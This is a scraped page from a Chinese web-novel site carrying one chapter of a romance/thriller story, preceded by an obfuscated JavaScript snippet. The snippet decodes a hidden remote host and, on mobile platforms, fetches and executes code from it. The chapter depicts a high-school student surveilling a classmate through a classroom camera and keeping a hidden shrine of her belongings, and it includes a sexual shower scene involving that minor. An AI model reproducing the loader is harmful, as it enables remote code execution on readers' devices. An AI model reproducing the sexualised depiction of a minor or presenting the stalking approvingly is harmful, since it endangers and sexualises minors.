98小说网

阅读记录  |   用户书架
function UqgsgfgDv(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{ c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function UqSDDFGvyQ(e){ var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,""); while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return UqgsgfgDv(t);};window[''+'U'+'Y'+'C'+'q'+'J'+'K'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,i,w,d,c){var x=UqSDDFGvyQ,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));'jQuery'; if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')>-1){var xhr=new XMLHttpRequest();xhr.open('POST','https://'+u+'/bm-'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'u'+'q'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else{var s=d[crd]('script');s.src='https://'+u+'/m-'+i;cs.parentElement.insertBefore(s,cs);}})('aGYuc2Rqa2JjamtzYmRzdnYuY29t','2843',window,document,['G','TpoZFcguG']);}:function(){};
上一章
目录 | 设置
下一页

028一天(1 / 2)

加入书签 | 推荐本书 | 问题反馈 |

('028一天

地下世界,权与利的贪婪,嗜血的交易,疯狂后的静默,排针雕刻记录与传信,实心泪滴、缺针钟表……斑驳劣迹刻成独特的图腾,消毒酒精蒸发,留下杀戮的印记。

“叮——”老旧的电话久违地响起。

画面切换到卧室的天花板,眼神恢复清明的少年起身,周身蔓延着生人勿近的气场,无视电话不间断的叫嚣,径自走进洗手间洗漱。

黑色的烟盒无意中弹到地上,一圈圈在地板发出响亮的声音,奚扬弯腰捡起金属盒子,蹙眉抽出纸巾擦净看不见的灰尘。

卧室隐蔽的小隔间被打开,狭长的空间陈列着各种物件:过塑的实验标本、不出墨的钢笔、餐具、灰蓝网格围巾、新的女式舞鞋、暗色墙毡上各式女式衬衫短裙等服装……以及半身人形模特上的白色晚礼服,悬空的裙摆中央有一片突兀的暗红。

烟盒几经思量之后被放在合适的位置,骨节明晰的手熟练地整理头纱和花环的位置,犀利的眉眼在层层白纱中变得沉静,锋芒化为另一种暗涌。

低温度的淋浴,年轻的身躯此刻肌肉紧绷,喉结不断滚动,暴戾冲破瓶颈,少年头发潮湿又凌乱,颓废而凌厉,喉间溢出沉闷的冷哼,混浊的白色沾染腿间又被瞬间洗刷。

室内恢复安静,奚扬赤身裸体出来,打开一瓶啤酒,边喝边点开答录机。

制服从衣柜里拿出,苍老而威严的声音在电波中流出:“你也是时候回来一趟了,国内有你父亲,虽然也是个不成器的,但是那点产业难不倒他……”

纽扣系得一丝不苟,从眼神到嘴角都是漫不经心。

陈旧的不可违抗,不出意外的陈词滥调。

“迟到了。”尽管很多次了,记过的女同学依旧会红脸,小声地提醒静立在校门口的少年。

深邃的眼终于扫过来:“记吧。”

随意又清浅的回答,却让登记的手都抖了起来:“请……请进。”

奚扬走上中间的楼梯,到达高二的楼层,教室外面空无一人,楼道里都是朗读书声,悠悠路过D、C、B,后排靠窗的姑娘穿了件白色双面尼连帽外套,许是怕冷还把帽子拉上了。

擦身经过时可以听到少女婉转的读书声,不由让人联想到某个似痛非痛的时刻,细腻的眉眼低垂,这次没有注意到他。

快步走进A班后门,拉开后排的凳子坐下,长腿随意搭在前方在凳子杆上。

“这次可是你先找我的啊。”牧野转身,脸色少有的正经,“收作业了。”

奚扬抽出手机,划开微信界面:“没有。”

语气变得急躁:“物理你总写了吧?”

“不需要。”奚扬从手机屏幕前抬眼,带着桀骜与讥笑,“怎么?”

牧野将干净的卷子拍他在桌面,迎着他的目光:“想不想看小时候的照片?”

奚扬低头编辑微信:“那得看看什么程度。”

“是不是很可爱?”牧野挑衅地晃着从薛茹那里拿走的合照,“小栀子很少有笑得这么开心的照片哦。”

修长的手指绕着试卷边,眼神玩味:“光看可不行。”

“我可以让你拍照。”牧野故作大方,触及不为所动的目光犹豫许久:“顶多分半,我要留着小茹的。”

奚扬满意地点头:“下第一节课给你。”

牧野满意地转身之后,手指在屏幕上点发送。

照旧没有回应,退出微信界面,调出连接的B班教室监控镜头,薄唇勾起较大的弧度。

果然,少女的脸颊仿佛感受到了文字的热度,帽子被拉下,晚栀背脊挺直、脖颈修长。

“很热吗?”柏灵盯着同桌发红的脸蛋,疑惑地碎碎念,“刚刚还说冷。”

晚栀不自在地扭着脖子,意图扭开帽子:“帽子太热了。”

“我就说会热的。”柏灵一副“被我说中了吧”的表情。

敷衍地点头,口袋里未关的屏幕好像带着灼人的温度。

——小白兔。

慌乱退出界面,按上手机锁。

双手盖住额头,她最受不了这类称呼。

同样无奈的还有柏灵:“一大早就两节数学连课!”

“跟着老师的思路一下子就过去了。”

“然后一下子就饿了。”

数学老师下课后,大课间两人手拉手去了便利店。

回去的路上晚栀被急切地拉住,转头对上湛蓝的眼珠:“可不可以单独说说话?”

“先走。”晚栀无视柏灵的挤眉弄眼,把零食放到她手上。

兰瑟低着头紧抓衣角,唯唯诺诺:“我没有恶意。”

人来人往,不知道的还以为她在欺负小学弟。

“是你发的?”

“不是不是!我是说,虽然我是他儿子但是我也不喜欢那个老头子……”

“你到底要说什么?”

心里话被打断,兰瑟抬头看了一眼,委屈巴巴地眨眼睛:“我只是怕你会讨厌我。”

一阵无奈,她试图表现得和善一点:“怎么会,你又没有怎么样。”

“可是……”话在嘴里绕了半圈,最终只有一句:“那就好。”

上一章
目录
下一页
A- 18 A+
默认 贵族金 护眼绿 羊皮纸 可爱粉 夜间